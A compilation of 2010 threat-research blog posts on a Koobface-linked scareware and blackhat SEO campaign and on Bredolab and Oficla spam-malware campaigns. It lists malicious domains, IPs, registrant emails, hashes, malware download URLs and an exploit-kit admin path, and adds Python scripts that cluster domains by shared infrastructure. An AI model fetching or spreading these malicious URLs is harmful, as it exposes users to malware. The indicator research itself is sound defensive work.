Let's dissect the campaign, expose the complete portfolio of scareware/redirector domains, emphasize the monetization vector, and show how this blackhat SEO campaign is using the same scareware affiliate network that the campaigns launched through Gumblar's infrastructure ([5]Spamvertised Best Buy, Macy's, Evite and Target Themed Scareware/Exploits Serving Campaign) continue to use.

Once the self.location.href = redirect condition is met, the following redirectors take place, until the user is exposed to the ubiquitous "You're infected" screen:

- dotyuzcifl.ru/liq/?st= - 200.63.44.211 - Email: kireev@ravermail.com (NS: ns1.freemobiledns.mobi Email: akorn1022@gmail.com)

- errgxhxzerr.co.cc/r/feed.php?k= - 200.63.44.211, AS27716, ASEVELOZ - Email: andrew_bush52@hotmail.com

- errgxhxzerr.co.cc/tube/?k=

- errgxhxzerr.co.cc/r/sss.php

- www4.protection-guard89.co.cc - 74.118.193.81, AS46664 - Email: abc.emm@gmail.com

- www1.virus-detection50.co.cc/?p=p52 - 94.228.220.117, AS47869, NETROUTING-AS - Email: abc.emm@gmail.com

- Detection rate:

packupdate9_289.exe - [6]Win32/TrojanDownloader.FakeAlert.AEY - 6/42 (14.3 %)

MD5: 3e4920aa3ff24db64372ae96854f3f02

SHA1: 75bcb6acf5ff65269bfc5f685e5d03688b8b1ade

SHA256: 7272f889520cd1d1898ccd91f1b01835cf53f06b452041baae0336796ff09fd7

Further scareware domains also respond to 94.228.220.117, AS47869, NETROUTING-AS.

It gets even more interesting, and cybercrime ecosystem-friendly, when we see that one of the scareware redirector domains has been registered with the same email as the scareware domain redirector used in the monetization vector of Gumblar's campaigns.

The currently used uramozat.cz .cc/scanner10/?afid=76 - 195.16.88.62, AS50109, HOSTLIFE-AS WIBO PROJECT LLC - Email: ydeconspi@nice-4u.com is registered using the same email as the recently used hoopdotami.cz .cc/scanner5/?afid=24 - 188.72.192.229 - Email: ydeconspi@nice-4u.com from the "[7]Spamvertised Best Buy, Macy's, Evite and Target Themed Scareware/Exploits Serving Campaign".

This centralization of monetization networks ultimately serves the security industry and law enforcement best, and remains a trend rather than a fad.
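The registrant-email and IP pivots drawn above, as an added example that is not code from the original post: it indexes a handful of the records quoted in these posts (the last entry is a constructed, unrelated control) and groups the domains that share an e-mail, hosting IP or name server, reporting which attribute links any two of them.

```python
from collections import defaultdict

# One record per domain: (domain, hosting IP, registrant e-mail, name server).
# Values are taken from the posts above (for baymediagroup.com, the first of the
# IPs listed); None means the post did not give that field. The last record is a
# constructed, unrelated control entry.
RECORDS = [
    ("dotyuzcifl.ru",     "200.63.44.211",   "kireev@ravermail.com",      "ns1.freemobiledns.mobi"),
    ("errgxhxzerr.co.cc", "200.63.44.211",   "andrew_bush52@hotmail.com", None),
    ("uramozat.cz.cc",    "195.16.88.62",    "ydeconspi@nice-4u.com",     None),
    ("sulphomihin.cz.cc", "195.16.88.62",    "ydeconspi@nice-4u.com",     None),
    ("hoopdotami.cz.cc",  "188.72.192.229",  "ydeconspi@nice-4u.com",     None),
    ("baymediagroup.com", "188.165.95.133",  "fb@bigmailbox.ru",          None),
    ("getyourdns.com",    None,              "fb@bigmailbox.ru",          None),
    ("zephehooqu.ru",     "77.78.240.115",   "skit@5mx.ru",               None),
    ("jocudaidie.ru",     "118.169.173.218", "skit@5mx.ru",               None),
    ("unrelated.example", "192.0.2.10",      "nobody@example.net",        "ns1.example.net"),
]

# Pivot attributes, in the order they appear in a record after the domain.
FIELDS = ("ip", "email", "ns")


def index_by_attribute(records):
    """Map 'field:value' to the set of domains carrying that value."""
    index = defaultdict(set)
    for domain, *values in records:
        for field, value in zip(FIELDS, values):
            if value is not None:          # an unknown field cannot be pivoted on
                index[f"{field}:{value}"].add(domain)
    return index


def shared_pivots(records):
    """Keep only the attributes that link two or more domains: the usable pivots."""
    return {k: v for k, v in index_by_attribute(records).items() if len(v) > 1}


def cluster(records):
    """Union-find over shared attributes; returns frozensets of linked domains."""
    parent = {domain: domain for domain, *_ in records}

    def find(d):
        while parent[d] != d:
            parent[d] = parent[parent[d]]  # path halving
            d = parent[d]
        return d

    for domains in shared_pivots(records).values():
        first, *rest = sorted(domains)
        for other in rest:
            parent[find(other)] = find(first)

    groups = defaultdict(set)
    for domain in parent:
        groups[find(domain)].add(domain)
    return sorted((frozenset(g) for g in groups.values()), key=sorted)


def links_between(records, a, b):
    """Attributes shared directly by domains a and b (empty list if none)."""
    return sorted(k for k, v in shared_pivots(records).items() if a in v and b in v)


if __name__ == "__main__":
    for group in cluster(RECORDS):
        print(", ".join(sorted(group)))
    # The cross-campaign link the post highlights: same registrant e-mail,
    # different hosting IPs.
    print(links_between(RECORDS, "uramozat.cz.cc", "hoopdotami.cz.cc"))
```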

Responding to 195.16.88.62 are also further affiliate redirector domains, all of them registered with ydeconspi@nice-4u.com.

• [8]Complete list of URLs for the compromised Dutch sites (NOW CLEAN) hosted at AS6461, MFNX MFN - Metromedia Fiber Network

The complete list of URLs for the compromised sites (CURRENTLY ACTIVE) hosted at AS15547, TVS2NET-NETPLUS, servicing cable-network customers in CH, was also compiled.

Responding to 200.63.44.211 (the original [9]redirector domains dotyuzcifl.ru; errgxhxzerr.co.cc), AS27716, ASEVELOZ Eveloz, are the remaining domains that are part of the scareware/redirection/Fake Adobe Player (tube/Adobe_Flash_Player.exe) campaign.

- Detection rate:

Adobe_Flash_Player.exe - [10]Heuristic.BehavesLike.Win32.Suspicious.H - 11/42 (26.2 %)

MD5: 8a10909c487a739e85028a19a1e898dc

SHA1: d9f7d78fe245f8df04fa398835b52d5a2c2d6af7

SHA256: 63befe78a7895a8efc6d893491d8f77ef8ada1cd52d562587490a79f29b65336

- Upon execution phones back to:

qualattice.com - 64.20.63.58 - Email: trough@mobiletonight.com

jaxcage.net - 91.188.60.233 - [11]AS6851, BKCNET "SIA" IZZI - Email: delee@easteroffers.com

mybubblebean.com - 85.234.190.47, [12]AS6851, BKCNET "SIA" IZZI - Email: place@popupquote.com

freejaxbird.net - 77.78.239.42 - Email: delee@easteroffers.com

onlinefeeds.ru - Email: beglov@insurer.com 
onlinegearsd.ru - Email: luzgin@smtp.ru 
onlinejimmmovse.ru - Email: abakumov@realtyagent.com 
onlineonlkiok.ru - Email: kirillov@billssite.com 
pgvvua6j.ru - Email: goncharov@bicyciing.com 



pororkol.ru - Email: erohin@bikerider.com 
prc6t7z3.ru - Email: kirikov@pochtamt.ru 
psxdvOnr.ru - Email: zhukov@inbox.ru 
pvbsiy5y.ru - Email: komarov@kinkyemail.com 
q3ysg05s.ru - Email: golodnikov@insurer.com 
qbecqeOs.ru - Email: ulyanov@bicycling.com 
qec5beqn.ru - Email: morozov@pochta.ru 
qfnye2t7.ru - Email: bednyakov@irow.com 
qpsxdvOn.ru - Email: viktorov@blackcity.net 
rikosdhu.ru - Email: pokatilov@pisem.net 
ronaldknol.ru - Email: taranov@smtp.ru 
rs3gpd0m.ru - Email: alekseev@bicycledata.com 
rudjimmdjimm.ru - Email: alekseev@boarderzone.com 
s4gvhd35.ru - Email: lebedev@blackvault.com 
s748eop4.ru - Email: aleksandrov@repairman.com 
612 

sgivnnOt.ru - Email: volkov@repairman.com 
stpf6qpv.ru - Email: bednyakov@relapsecult.com 
sv4wmtxj.ru - Email: ivanov@bikerider.com 
t0a2afyq.ru - Email: ivanov@boatnerd.com 



t3tzynvj.ru - Email: bazhenov@rapstar.com 
trustincompanies.ru - Email: abdulov@insurer.com 
u5fyfzjt.ru - Email: polovov@rbcmail.ru 
ucf47vnu.ru - Email: abdulov@bikerider.com 
uplcash.com - Email: director@climbing-games.com 
v5w3xgzn.ru - Email: morozov@rbcmail.ru 
vgksry7k.ru - Email: vishnevskiy@land.ru 
w8iroomb.ru - Email: goiodnikov@pop3.ru 
x7p03g0j.ru - Email: kirikov@front.ru 
xni27ftd.ru - Email: timofeev@mail.ru 
xsd3id8t.ru - Email: kovalev@pochta.ru 
xthjrgxz.ru - Email: pokatilov@insurer.com 
xu44i03y.ru - Email: arhipov@insurer.com 
yiOewtmd.ru - Email: antonov@blackvault.com 
yp7o07nq.ru - Email: golodnikov@rbcmail.ru 
z26hggcb.ru - Email: pokatilov@fromru.com 
z656cvje.ru - Email: slabkov@boatnerd.com 
zsrd4xj5.ru - Email: kuznecov@iname.com 
zznks8fh.ru - Email: bulaev@registerednurses.com 
Could we have a blackhat SEO campaign without a Koobface gang connection? Appreciate my rhetoric. Parked at 200.63.44.48, again within AS27716, ASEVELOZ Eveloz, are the following domains:

35l3cv2oywwycrfzlyo3.com - Email: michaeltycoon@gmail.com
4idmcxlczdy52yh7rklb.com - Email: michaeltycoon@gmail.com
56ml7zj047l0x6wm9v6y.com - Email: michaeltycoon@gmail.com
8vsgzuu084e9i8ohl5nn.com - Email: michaeltycoon@gmail.com
aatyamikpgxp8h3ml7ky.com - Email: michaeltycoon@gmail.com
bvzpvunifooe8t946d2p.com - Email: michaeltycoon@gmail.com
i905jzsht33cd4kfcqvh.com - Email: michaeltycoon@gmail.com
jhn72w76khysuxdgj0bo.com - Email: michaeltycoon@gmail.com
k78ju8lyzratna0c5r7m.com - Email: michaeltycoon@gmail.com
Irbx4hzznbdmedfk4xrd.com - Email: michaeltycoon@gmail.com
Isleepnzj784nid96prn.com - Email: michaeltycoon@gmail.com
n0itv7fh7qscrfse3ili.com - Email: michaeltycoon@gmail.com
pdusxsiuedamjc83qipi.com - Email: michaeltycoon@gmail.com
rabotaetpoiubomu.net - Email: michaeltycoon@gmail.com
t0vqred4itv4pmo488k9.com - Email: michaeltycoon@gmail.com
thmyb0s6se5febs0ghb8.com - Email: michaeltycoon@gmail.com
u5a05qldnmr4jwqrnav3.com - Email: michaeltycoon@gmail.com
uqlwedg9tr523wbafdzp.com - Email: michaeltycoon@gmail.com
vk4j2x7n49nqlil9vm5h.com - Email: michaeltycoon@gmail.com
ysut5gx094w2dddjtswh.com - Email: michaeltycoon@gmail.com


Deja vu! Where do we know the michaeltycoon@gmail.com email from? From the "[13] A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang" campaign, and in particular from the fact that it was once directly connected to the Koobface gang. This is not an email that was used to register a domain belonging to the scareware affiliate network; instead, it is an email used to register a client-side exploits serving domain parked on the same IP where a hardcore Koobface C&C from Koobface 1.0's infrastructure, urodinam.net, was responding:

• [14] Dissecting the Mass DreamHost Sites Compromise - "Moreover, on the exact same IP where Koobface gang's urodinam.net is parked, we also have the currently active Izabsiwvn538n4i5tcji.com - Email: michaeltycoon@gmail.com, serving client side exploits using the Yes Malware Exploitation kit - 91.188.59.10 /temp/cache/PDF.php; admin panel at: Izabsiwvn538n4i5tcji.com /temp/admin/index.php"

Blackhat SEO campaigns, the migration from the Koobface-friendly AS31252 (STARNET-AS StarNet Moldova), plus the direct connection that gets established because a migrating customer usually takes all of his dirty luggage with him, prove that there is no such thing as coincidence within the cybercrime ecosystem. There is just a diverse infrastructure where everyone appears to be self-serving their needs as a service, consequently forwarding responsibility for someone else's actions to the infrastructure they are abusing.

Related blackhat SEO/scareware monetization assessments:

[15] Dissecting the 100,000+ Scareware Serving Fake YouTube Pages Campaign

[16] Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign - Part Two

[17] Blackhat SEO Campaign Hijacks U.S Federal Form Keywords > Serves Scareware

[18] U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding

[19] Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign

[20] The ultimate guide to scareware protection

[21] A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang

[22] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style

[23] A Peek inside the Managed Blackhat SEO Ecosystem

[24] Dissecting a Swine Flu Black SEO Campaign

[25] Massive Blackhat SEO Campaign Serving Scareware

[26] From Ukrainian Blackhat SEO Gang With Love

[27] From Ukrainian Blackhat SEO Gang With Love - Part Two

[28] From Ukraine with Scareware Serving Tweets, Bogus Linkedin/Scribd Accounts, and Blackhat SEO Farms

[29] From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts

[30] Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot

This post has been reproduced from [31] Dancho Danchev's blog. Follow him [32] on Twitter.

1. http://ddanchev.blogspot.com/2010/03/koobface-redirectors-and-scareware.html

2. http://ddanchev.blogspot.com/2010/04/dissecting-koobface-gangs-latest.html

3. http://ddanchev.blogspot.com/2010/05/koobface-gang-responds-to-10-things-you.html

4. http://ddanchev.blogspot.com/2010/05/from-koobface-gang-with-scareware.html

5. http://ddanchev.blogspot.com/2010/08/spamvertised-best-buy-macys-evite-and.html

6. http://www.virustotal.com/file-scan/report.html?id=7272f889520cd1d1898ccd91f1b01835cf53f06b452041baae0336796ff09fd7-1281703284

7. http://ddanchev.blogspot.com/2010/08/spamvertised-best-buy-macys-evite-and.html

8. http://pastebin.com/POUKr7aE

9. http://3.bp.blogspot.com/_wICHhTiOmrA/TGVGu7EoilI/AAAAAAAAEzo/oaThblEDFcU/s1600/Blackhat_SEO_Dutch_Swiss_scareware2.PNG

10. http://www.virustotal.com/file-scan/report.html?id=63befe78a7895a8efc6d893491d8f77ef8ada1cd52d562587490a79f29b65336-1281711013

11. http://ddanchev.blogspot.com/2010/07/exploits-malware-and-scareware-courtesy.html

12. http://ddanchev.blogspot.com/2010/07/exploits-malware-and-scareware-courtesy.html

13. http://ddanchev.blogspot.com/2010/02/diverse-portfolio-of-scarewareblackhat.html

14. http://ddanchev.blogspot.com/2010/05/dissecting-mass-dreamhost-sites.html

15. http://ddanchev.blogspot.com/2010/06/dissecting-100000-scareware-serving.html

16. http://ddanchev.blogspot.com/2010/06/dissecting-ongoing-us-federal-forms.html

17. http://ddanchev.blogspot.com/2009/08/blackhat-seo-campaign-hijacks-us.html

18. http://ddanchev.blogspot.com/2009/08/us-federal-forms-blackhat-seo-themed.html

19. http://ddanchev.blogspot.com/2009/08/dissecting-ongoing-us-federal-forms.html

20. http://www.zdnet.com/blog/security/the-ultimate-guide-to-scareware-protection/4297

21. http://ddanchev.blogspot.com/2010/02/diverse-portfolio-of-scarewareblackhat.html

22. http://ddanchev.blogspot.com/2009/11/massive-scareware-serving-blackhat-seo.html

23. http://ddanchev.blogspot.com/2009/06/peek-inside-managed-blackhat-seo.html

24. http://ddanchev.blogspot.com/2009/05/dissecting-swine-flu-black-seo-campaign.html

25. http://ddanchev.blogspot.com/2009/04/massive-blackhat-seo-campaign-serving.html

26. http://ddanchev.blogspot.com/2009/06/from-ukrainian-blackhat-seo-gang-with.html

27. http://ddanchev.blogspot.com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.html

28. http://ddanchev.blogspot.com/2009/06/from-ukraine-with-scareware-serving.html

29. http://ddanchev.blogspot.com/2009/07/from-ukraine-with-bogus-twitter.html

30. http://ddanchev.blogspot.com/2009/06/fake-web-hosting-provider-front-end-to.html

31. http://ddanchev.blogspot.com/

32. http://twitter.com/danchodanchev
Historical OSINT: Celebrities Death, Fedex Invoices, Office-Themed Malware Campaigns (2010-09-08 21:07)

[1] As promised, this would be a pretty short historical OSINT post - catching up is in progress - detailing the structure of several campaigns that took place throughout July-August, 2010, and (as always) trying to emphasize the connection with historical malware campaigns profiled on my personal blog.

Campaigns of notice include: spamvertised "Celebrities death-themed emails", "Fedex shipment status themed invoices", and "Office-themed documents".

Sample subjects:

Angelina Jolie died; Gwen Stefani died; Oprah Winfrey died; Tom Cruise died; Application; Thursday Journal Club; End Of Rotation; Abstracts; Project Declaration; Residency Happy Hour: SOP POLICIES; Fwd: Updated Journal Club Handout

Sample attachments:

journal club articles.zip; Rotation Input Sheet.zip; ppi and c dif.zip; MSpeck.zip; ResidencyPrep.zip; speck Case presentation draft.zip; journal club template.zip


Detection rates, phone back URLs, and connections with previously profiled campaigns:

- [2] news.exe - Trojan.Bredolab-993 - 40/43 (93.0 %)

MD5: 44522def7cf2a42aa26f59c2ac4ced58
SHA1: 2f60531b6e33d842eba505f3c3cb81a3ff6e3e6a

- [3] journal club articles.exe - Backdoor/Bredolab.edb - 41/43 (95.3 %)

MD5: 72e90fd1264e731109d1b6b977b2c744
SHA1: 0a36b882d1b4d8b42cc466ec286e95bbb2e77d49

Upon execution, the samples phone back to:

188.65.74.161 /mrmun sgjlgdsjrthrtwg.exe - AS42473 - DOWN
194.28.112.37 /outlook.exe - AS48691 - ACTIVE

- [4] outlook.exe - TrojanSpy:Win32/Fitmu.A - 17/43 (39.5 %)

MD5: 8f4eca49b87e36daae14b8549071dece
SHA1: 1d390e9f8d6e744ead58dd6c424581419f732498

Upon execution, the dropped sample phones back to:

cuscuss.com - 188.65.74.164 - Email: info@blackry.com
Responding to 188.65.74.164 at AS42473 are also:

wiggete.com - Email: info@blackry.com
depenam.com - Email: info@blackry.com
fishum.com - Email: info@blackry.com
blackry.com - Email: info@blackry.com

Two of the domains are known to have been serving client-side exploits, but the redirection is currently returning an error "Connect to 188.40.232.254 on port 80 ... failed".

- depenam .com/count22.php
- blackry .com/count21.php
- vseohuenno .com/trans/b3/ - 188.40.232.254 - Email: latertrans@gmail.com

Responding to 188.40.232.254, AS24940 are also the following command and control, client-side exploit serving domains:

gurgamer.com - (New IP: 86.155.172.30) Email: latertrans@gmail.com
moneybeerers.com - Email: latertrans@gmail.com
daeshnew.com - (New IP: 86.145.158.90) Email: latertrans@gmail.com
volosatyhren.com - Email: latertrans@gmail.com
vyebyvglaz.com - Email: latertrans@gmail.com




- [5] FedexInvoice_EE776129.exe - Win32/Oficla.LK - 41/43 (95.3 %)

MD5: d4e2875127f5cbdf797de7f1417f96a7
SHA1: c2df8d8c178142ba7bee48dbf9a9f68c32a14f5e

Upon execution, the sample phones back to:

ilovelasvegas .ru/web/St/bb.php?v=200&id=636608811&b=24augNEW&tm= - 109.196.134.44, AS39150 - Email: vadim.rinatovich@yandex.ru, with x5vsm5.ru - Email: vadim.rinatovich@yandex.ru also parked there.

Where do we know the vadim.rinatovich@yandex.ru email from? From two previously profiled campaigns, "[6] Spamvertised iTunes Gift Certificates and CV Themed Malware Campaigns" and "[7] Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign", both having a direct relationship with the Asprox botnet.
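The analytical step repeated here (vadim.rinatovich@yandex.ru tying this campaign to the Asprox-related ones) and in the Koobface blackhat SEO post above (michaeltycoon@gmail.com tying a parked domain back to urodinam.net's IP) is a WHOIS registrant and hosting pivot over IoC listings. The script below is an added example of that pivot, not the author's tooling: it parses listing lines in the "domain - Email: address" format these posts use, normalises extraction artefacts such as spaces inside the address, and reports registrant emails that recur across campaigns and IPs hosting more than one listed domain. The `# campaign=... ip=...` header lines, the campaign tags and the `.invalid` placeholder domain are my own constructions; the other domains, emails and IPs are the ones listed in the posts.

```python
import re
from collections import defaultdict

# Constructed sample in the listing style the posts use. Domains, registrant
# emails and IPs are taken from the posts; the "# campaign=... ip=..." headers
# and campaign tags are my own labels, and the .invalid entry stands in for a
# domain of the earlier iTunes campaign that this page does not name.
SAMPLE_LISTING = """\
# campaign=koobface-seo-2010-08 ip=200.63.44.48
35l3cv2oywwycrfzlyo3.com - Email: michaeltycoon@gmail.com
rabotaetpoiubomu.net - Email: michaeltycoon@gmail. com
# campaign=dreamhost-compromise-2010-05 ip=91.188.59.10
Izabsiwvn538n4i5tcji.com - Email: michaeltycoon@gmail.com
# campaign=celebrity-death-spam-2010-08 ip=109.196.134.44
ilovelasvegas.ru - Email: vadim.rinatovich@yandex.ru
x5vsm5.ru - Email: vadim.rinatovich@yandex.ru
# campaign=itunes-gift-certificates-2010-05 ip=192.0.2.10
placeholder-domain.invalid - Email: vadim.rinatovich@yandex.ru
# campaign=celebrity-death-spam-2010-08
cuscuss.com - 188.65.74.164 - Email: info@blackry.com
wiggete.com - 188.65.74.164 - Email: info@blackry.com
"""

# A header line sets the campaign (and optionally the IP) for the entries below it.
HEADER_RE = re.compile(r"^#\s*campaign=(?P<campaign>\S+)(?:\s+ip=(?P<ip>\S+))?")
# An entry is "domain - Email: addr" or "domain - IP - Email: addr".
ENTRY_RE = re.compile(
    r"^(?P<domain>\S+)\s+-\s+(?:(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+-\s+)?Email:\s*(?P<email>.+)$"
)


def parse_listing(text):
    """Turn the listing text into records {domain, email, ip, campaign}."""
    records = []
    campaign, ip = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        h = HEADER_RE.match(line)
        if h:
            campaign, ip = h.group("campaign"), h.group("ip")
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        # Whitespace inside the address ("gmail. com") is a common extraction
        # artefact in these listings, so drop it before lower-casing.
        email = re.sub(r"\s+", "", m.group("email")).lower()
        records.append({
            "domain": m.group("domain").lower(),
            "email": email,
            "ip": m.group("ip") or ip,   # inline IP wins over the header IP
            "campaign": campaign,
        })
    return records


def pivot_by_email(records):
    """Group domains, IPs and campaigns under each registrant email."""
    index = defaultdict(lambda: {"domains": set(), "ips": set(), "campaigns": set()})
    for r in records:
        entry = index[r["email"]]
        entry["domains"].add(r["domain"])
        if r["ip"]:
            entry["ips"].add(r["ip"])
        if r["campaign"]:
            entry["campaigns"].add(r["campaign"])
    return dict(index)


def cross_campaign_registrants(records):
    """Emails that registered domains in more than one campaign, the 'deja vu'
    links the posts draw, as {email: sorted campaign tags}."""
    return {
        email: sorted(e["campaigns"])
        for email, e in pivot_by_email(records).items()
        if len(e["campaigns"]) > 1
    }


def cohosted_domains(records):
    """IPs that host more than one listed domain, as {ip: sorted domains}."""
    by_ip = defaultdict(set)
    for r in records:
        if r["ip"]:
            by_ip[r["ip"]].add(r["domain"])
    return {ip: sorted(d) for ip, d in by_ip.items() if len(d) > 1}


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    for email, camps in cross_campaign_registrants(recs).items():
        print(f"{email}: seen in {', '.join(camps)}")
    for ip, doms in cohosted_domains(recs).items():
        print(f"{ip}: {', '.join(doms)}")
```

Run stand-alone it prints the two recurring registrants and the three IPs hosting more than one listed domain. In practice the listing text would be replaced by a WHOIS or passive DNS export, and a registrant seen across campaigns is a lead to verify rather than a verdict, since privacy-proxy and reseller contact addresses recur for benign reasons as well.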

This post has been reproduced from [8] Dancho Danchev's blog. Follow him [9] on Twitter.

1. http://twitter.com/danchodanchev/status/23254748308

2. http://www.virustotal.com/file-scan/report.html?id=261fef06471fb9a90928e21e027cb058cc84a0c310995f3ca95ce06bea8f98cf-1283961575

3. http://www.virustotal.com/file-scan/report.html?id=f6c4e1472681ae9ea4a0c19cfd75c5ce86477e4f48612e543b219bc23d5c9d29-1283961571

4. http://www.virustotal.com/file-scan/report.html?id=616bc4458686384081be9a9b654a8b99b4cbbbf395b4650d01d4bcfe798119b4-1283962155

5. http://www.virustotal.com/file-scan/report.html?id=01f7ee45f242de43f733c15e0238ca09b1cf8fe9ec8c7ca7f4b95ca7959c2934-1283961566

6. http://ddanchev.blogspot.com/2010/05/spamvertised-itunes-gift-certificates.html

7. http://ddanchev.blogspot.com/2010/07/dissecting-xerox-workcentre-pro-scanned.html

8. http://ddanchev.blogspot.com/

9. http://twitter.com/danchodanchev
Summarizing 3 Years of Research Into Cyber Jihad (2010-09-11 16:24)

From the "been there, actively researched that" department.

1. [1] Tracking Down Internet Terrorist Propaganda

2. [2] Arabic Extremist Group Forum Messages' Characteristics

3. [3] Cyber Terrorism Communications and Propaganda

4. [4] A Cost-Benefit Analysis of Cyber Terrorism

5. [5] Current State of Internet Jihad

6. [6] Analysis of the Technical Mujahid - Issue One

7. [7] Full List of Hezbollah's Internet Sites

8. [8] Steganography and Cyber Terrorism Communications

9. [9] Hezbollah's DNS Service Providers from 1998 to 2006

10. [10] Mujahideen Secrets Encryption Tool

11. [11] Analyses of Cyber Jihadist Forums and Blogs

12. [12] Cyber Traps for Wannabe Jihadists

13. [13] Inshallahshaheed - Come Out, Come Out Wherever You Are

14. [14] GIMF Switching Blogs

15. [15] GIMF Now Permanently Shut Down

16. [16] GIMF - "We Will Remain"

17. [17] Wisdom of the Anti Cyber Jihadist Crowd

18. [18] Cyber Jihadist Blogs Switching Locations Again

19. [19] Electronic Jihad v3.0 - What Cyber Jihad isn't

20. [20] Electronic Jihad's Targets List

21. [21] Teaching Cyber Jihadists How to Hack

22. [22] A Botnet of Infected Terrorists?

23. [23] Infecting Terrorist Suspects with Malware

24. [24] The Dark Web and Cyber Jihad

25. [25] Cyber Jihadist Hacking Teams

26. [26] Two Cyber Jihadist Blogs Now Offline

27. [27] Characteristics of Islamist Websites

28. [28] Cyber Traps for Wannabe Jihadists

29. [29] Mujahideen Secrets Encryption Tool

30. [30] An Analysis of the Technical Mujahid - Issue Two

31. [31] Terrorist Groups' Brand Identities

32. [32] A List of Terrorists' Blogs

33. [33] Jihadists' Anonymous Internet Surfing Preferences

34. [34] Sampling Jihadists' IPs

35. [35] Cyber Jihadists and TOR

36. [36] A Cyber Jihadist DoS Tool

37. [37] GIMF Now Permanently Shut Down

38. [38] Mujahideen Secrets 2 Encryption Tool Released

39. [39] Terror on the Internet - Conflict of Interest

This post has been reproduced from [40] Dancho Danchev's blog. Follow him [41] on Twitter.

1. http://ddanchev.blogspot.com/2006/06/tracking-down-internet-terrorist.html

2. http://ddanchev.blogspot.com/2006/05/arabic-extremist-group-forum-messages.html

3. http://ddanchev.blogspot.com/2006/08/cyber-terrorism-communications-and_22.html

4. http://ddanchev.blogspot.com/2006/10/cost-benefit-analysis-of-cyber.html

5. http://ddanchev.blogspot.com/2006/12/current-state-of-internet-jihad.html

6. http://ddanchev.blogspot.com/2006/12/analysis-of-technical-mujahid-issue-one.html

7. http://ddanchev.blogspot.com/2006/12/full-list-of-hezbollahs-internet-sites.html

8. http://ddanchev.blogspot.com/2006/08/steganography-and-cyber-terrorism.html

9. http://ddanchev.blogspot.com/2006/09/hezbollahs-dns-service-providers-from.html

10. http://ddanchev.blogspot.com/2007/04/mujahideen-secrets-encryption-tool.html

11. http://ddanchev.blogspot.com/2007/08/analyses-of-cyber-jihadist-forums-and.html

12. http://ddanchev.blogspot.com/2007/03/cyber-traps-for-wannabe-jihadists.html

13. http://ddanchev.blogspot.com/2007/12/inshallahshaheed-come-out-come-out.html

14. http://ddanchev.blogspot.com/2007/07/gimf-switching-blogs.html

15. http://ddanchev.blogspot.com/2007/08/gimf-now-permanently-shut-down.html

16. http://ddanchev.blogspot.com/2007/08/gimf-we-will-remain.html

17. http://ddanchev.blogspot.com/2007/10/wisdom-of-anti-cyber-jihadist-crowd.html

18. http://ddanchev.blogspot.com/2007/11/cyber-jihadist-blogs-switching.html

19. http://ddanchev.blogspot.com/2007/11/electronic-jihad-v30-what-cyber-jihad.html

20. http://ddanchev.blogspot.com/2007/11/electronic-jihads-targets-list.html

21. http://ddanchev.blogspot.com/2007/11/teaching-cyber-jihadists-how-to-hack.html

22. http://ddanchev.blogspot.com/2007/11/botnet-of-infected-terrorists.html

23. http://ddanchev.blogspot.com/2007/09/infecting-terrorist-suspects-with.html

24. http://ddanchev.blogspot.com/2007/09/dark-web-and-cyber-jihad.html

25. http://ddanchev.blogspot.com/2007/12/cyber-jihadist-hacking-teams.html

26. http://ddanchev.blogspot.com/2007/09/two-cyber-jihadist-blogs-now-offline.html

27. http://ddanchev.blogspot.com/2007/02/characteristics-of-islamist-websites.html

28. http://ddanchev.blogspot.com/2007/03/cyber-traps-for-wannabe-jihadists.html

29. http://ddanchev.blogspot.com/2007/04/mujahideen-secrets-encryption-tool.html

30. http://ddanchev.blogspot.com/2007/06/analysis-of-technical-mujahid-issue-two.html

31. http://ddanchev.blogspot.com/2007/07/terrorist-groups-brand-identities.html

32. http://ddanchev.blogspot.com/2007/06/list-of-terrorists-blogs.html

33. http://ddanchev.blogspot.com/2007/05/jihadists-anonymous-internet-surfing.html

34. http://ddanchev.blogspot.com/2007/05/sampling-jihadists-ips.html

35. http://ddanchev.blogspot.com/2007/07/cyber-jihadists-and-tor.html

36. http://ddanchev.blogspot.com/2007/08/cyber-jihadist-dos-tool.html

37. http://ddanchev.blogspot.com/2007/08/gimf-now-permanently-shut-down.html

38. http://ddanchev.blogspot.com/2008/01/mujahideen-secrets-2-encryption-tool.html

39. http://ddanchev.blogspot.com/2008/03/terror-on-internet-conflict-of-interest.html

40. http://ddanchev.blogspot.com/

41. http://twitter.com/danchodanchev
Top Ten Must-Read DDanchev Posts For 2010 (2011-01-22 00:25)

01. [1] How the Koobface Gang Monetizes Mac OS X Traffic

02. [2] AS50215 Troyak-as Taken Offline, Zeus C&Cs Drop from 249 to 181

03. [3] The DNS Infrastructure of the Money Mule Recruitment Ecosystem

04. [4] The Avalanche Botnet and the TROYAK-AS Connection

05. [5] Koobface Gang Responds to the "10 Things You Didn't Know About the Koobface Gang" Post

06. [6] Sampling Malicious Activity Inside Cybercrime-Friendly Search Engines

07. [7] GazTransitStroy/GazTranZitStroy: From Scareware to Zeus Crimeware and Client-Side Exploits

08. [8] Dissecting Northwestern Bank's Client-Side Exploits Serving Site Compromise

09. [9] U.S. Treasury Site Compromise Linked to the NetworkSolutions Mass WordPress Blogs Compromise

10. [10] TorrentReactor.net Serving Crimeware, Client-Side Exploits Through a Malicious Ad

This post has been reproduced from [11] Dancho Danchev's blog.

1. http://ddanchev.blogspot.com/2010/02/how-koobface-gang-monetizes-mac-os-x.html

2. http://ddanchev.blogspot.com/2010/03/as50215-troyak-as-taken-offline-zeus-c.html

3. http://ddanchev.blogspot.com/2010/04/dns-infrastructure-of-money-mule.html

4. http://ddanchev.blogspot.com/2010/05/avalanche-botnet-and-troyak-as.html

5. http://ddanchev.blogspot.com/2010/05/koobface-gang-responds-to-10-things-you.html

6. http://ddanchev.blogspot.com/2010/07/sampling-malicious-activity-inside.html

7. http://ddanchev.blogspot.com/2010/03/gaztransitstroygaztranzitstroy-from.html

